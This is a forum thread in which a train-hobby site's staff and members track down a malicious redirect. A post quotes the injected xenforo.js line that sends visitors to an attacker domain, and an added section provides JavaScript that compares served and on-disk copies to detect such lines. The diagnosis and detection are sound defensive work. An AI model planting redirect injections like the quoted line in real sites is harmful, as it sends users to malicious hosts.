Site redirects

RBrodzinsky Oct 6, 2018

  1. RBrodzinsky

    RBrodzinsky Staff Member TrainBoard Supporter

    I am getting multiple reports of folks getting redirected away from the site. I have seen it with Safari, on my iPad, but Chrome on the iPad is fine. Firefox on my PC was good, too (at least a few hours ago).

    The redirect goes to a site with URL resercherass dot icu
     
  2. wvgca

    wvgca TrainBoard Member

    firefox on win10 / pc still good as of now ..
     
  3. vasilis

    vasilis TrainBoard Member

    Redirects me to https://generzapgenetic.idv.am/ and then stops, server not responding. Firefox and Chrome. Antivirus stopped the same problem. No problem with other sites.
     
  4. Atani

    Atani TrainBoard Member

    Mine also redirects to generzapgenetic.idv.am and Chrome kills it, as the certificate for the site is not trusted by Chrome 70+. This appears to be loaded from an iframe related to the Twitter integration possibly. I suspect it is a rotating ad banner or something related to that.
     
  5. RBrodzinsky

    RBrodzinsky Staff Member TrainBoard Supporter

    This morning, the generzap.... is where my Safari is redirecting to. Firefox (on Win7 and Win10 machines) and Chrome (on Win7, my Android phone (Galaxy S5) and iPad) work. Chrome on my Win10 is redirecting each time the page is refreshed.
     
  6. bremner

    bremner Staff Member

    Last night, I spent an hour or so in the files looking for changes in the code, and for malware. I did not see any signs of malware in the partition. I am running GoDaddy security through it right now (they own Sucuri, so it is a good service).

    It is possible that one of the ads might be pulling in the redirect. Some hosting companies will block the JavaScripts that ad companies use due to potential issues. I have seen these cause issues with injections.
     
  7. Atani

    Atani TrainBoard Member

    So, what are the options? Right now the site is unusable in a browser due to the redirect being sent repeatedly while sitting on the page; even entering a message for a post was resulting in multiple redirects before I could type and submit.

    Sent from my ONEPLUS A5010 using Tapatalk
     
  8. bremner

    bremner Staff Member

    I am trying to narrow it down; I have not seen an issue with any device using Chrome.
     
    Atani likes this.
  9. RBrodzinsky

    RBrodzinsky Staff Member TrainBoard Supporter

    I did have a Chrome issue on my Windows 10 PC (Lenovo Yoga 710). FF on that PC was just fine.
     
  10. wvgca

    wvgca TrainBoard Member

    it happened once while using windows 10 / pc box / firefox .. back to semi-normal
     
  11. Mr. Trainiac

    Mr. Trainiac TrainBoard Member

    Could it have something to do with the fact that this site is not secure? Is this like the hack that happened a year or two ago? I am on my iPad right now (website), but yesterday, my laptop was going to the site RBrodzinsky said.
     
  12. bremner

    bremner Staff Member

    I really think that the issue is not on our server, but on an ad. It would be interesting to know what ads were on the page before the redirect, but with how quickly it happens, you can't see everything.

    I looked in all of the normal files for a redirect and did not see any issues.

    On a professional level, I look for malware on websites all the time.
     
  13. bremner

    bremner Staff Member

    The "not secure" warning in Chrome simply means that there isn't an SSL certificate. An SSL encrypts data that is entered into the site.

    https://security.googleblog.com/2018/02/a-secure-web-is-here-to-stay.html
     
  14. Mr. Trainiac

    Mr. Trainiac TrainBoard Member

    Since this is a recent issue, I am trying to think what new ads were on the page. I am looking at a Halloween train ad for MicroTrains right now, and Bluford got a new background on one of their ads. Other than that, I don’t know. Could one of our advertisers’ sites have gotten messed with, which screwed ours up too?
     
  15. Atani

    Atani TrainBoard Member

    I found one reference to generzapgenetic.idv.am in my browser session log that points to xenforo.js as initiator of the forced redirect. The following is in the js file:
    Code:
    setTimeout(function(){ window.location = "https://generzapgenetic.idv.am"},1000);
    
    Near the top of the js file returned from this url: http://www.trainboard.com/highball/js/xenforo/xenforo.js
     
    bremner likes this.
  16. bremner

    bremner Staff Member

    Thanks for the info, but I went through ALL of the JS that loads when the FOS loads; there is nothing in there calling on generzapgenetic.idv.am.
     
  17. Atani

    Atani TrainBoard Member

    It is very weird, it is there when I pull the js file linked above. No clue how or why that line is in there..

    Sent from my ONEPLUS A5010 using Tapatalk
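
Posts 15 to 17 describe a script that shows nothing unusual to the admin while the copy a browser pulls carries a redirect line. The check below is an added example, not code from the thread or from XenForo: it compares a served copy with the on-disk copy and flags served-only lines that navigate to another host. Both file bodies are constructed stand-ins apart from the line quoted in post 15, and the function names are hypothetical.

```javascript
// Added example. SITE_HOST comes from the URL quoted in post 15.
const SITE_HOST = "www.trainboard.com";

// Navigation sinks: location = "...", location.href = "...",
// location.replace("...") and location.assign("...").
const NAV_RE = /(?:window\.|document\.|top\.)?location(?:\.href)?\s*=\s*["']([^"']+)["']|location\.(?:replace|assign)\(\s*["']([^"']+)["']/g;

// Return the hosts a line of JS navigates to that are not the site itself.
function offSiteNavigations(line, siteHost) {
  const hosts = [];
  for (const m of line.matchAll(NAV_RE)) {
    const target = m[1] || m[2];
    let host;
    // Resolve relative and protocol-relative targets against the site.
    try { host = new URL(target, `http://${siteHost}/`).hostname; } catch { continue; }
    if (host !== siteHost) hosts.push(host);
  }
  return hosts;
}

// Report every non-empty served line that is absent from the on-disk copy.
function compareServedToDisk(diskText, servedText, siteHost) {
  const diskLines = new Set(diskText.split(/\r?\n/).map((s) => s.trim()));
  const findings = [];
  servedText.split(/\r?\n/).forEach((raw, i) => {
    const text = raw.trim();
    if (text === "" || diskLines.has(text)) return;
    findings.push({ lineNo: i + 1, text, offSiteHosts: offSiteNavigations(text, siteHost) });
  });
  return findings;
}

// Constructed stand-in for the file as read from the server's disk.
const diskCopy = [
  "/* xenforo.js (constructed stand-in) */",
  "var XenForo = {};",
  "XenForo.init = function () { return true; };",
].join("\n");

// Constructed stand-in for the file as fetched by a browser; line 2 is the
// line quoted in post 15.
const servedCopy = [
  "/* xenforo.js (constructed stand-in) */",
  'setTimeout(function(){ window.location = "https://generzapgenetic.idv.am"},1000);',
  "var XenForo = {};",
  "XenForo.init = function () { return true; };",
].join("\n");

const findings = compareServedToDisk(diskCopy, servedCopy, SITE_HOST);
console.log(JSON.stringify(findings, null, 2));
```

A served-only line with an empty `offSiteHosts` list is still a difference worth explaining, since anything that rewrites the response between disk and browser can add more than redirects.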
     
  18. bremner

    bremner Staff Member

    Just restarted apache
     
  19. bremner

    bremner Staff Member

    Java is a funny way of scripting, it calls on different items...

    [​IMG]
     
    Atani likes this.
  20. RBrodzinsky

    RBrodzinsky Staff Member TrainBoard Supporter

    Still there on Safari. Two new ads did show up recently: The Ornament Shop and JTC Models
     
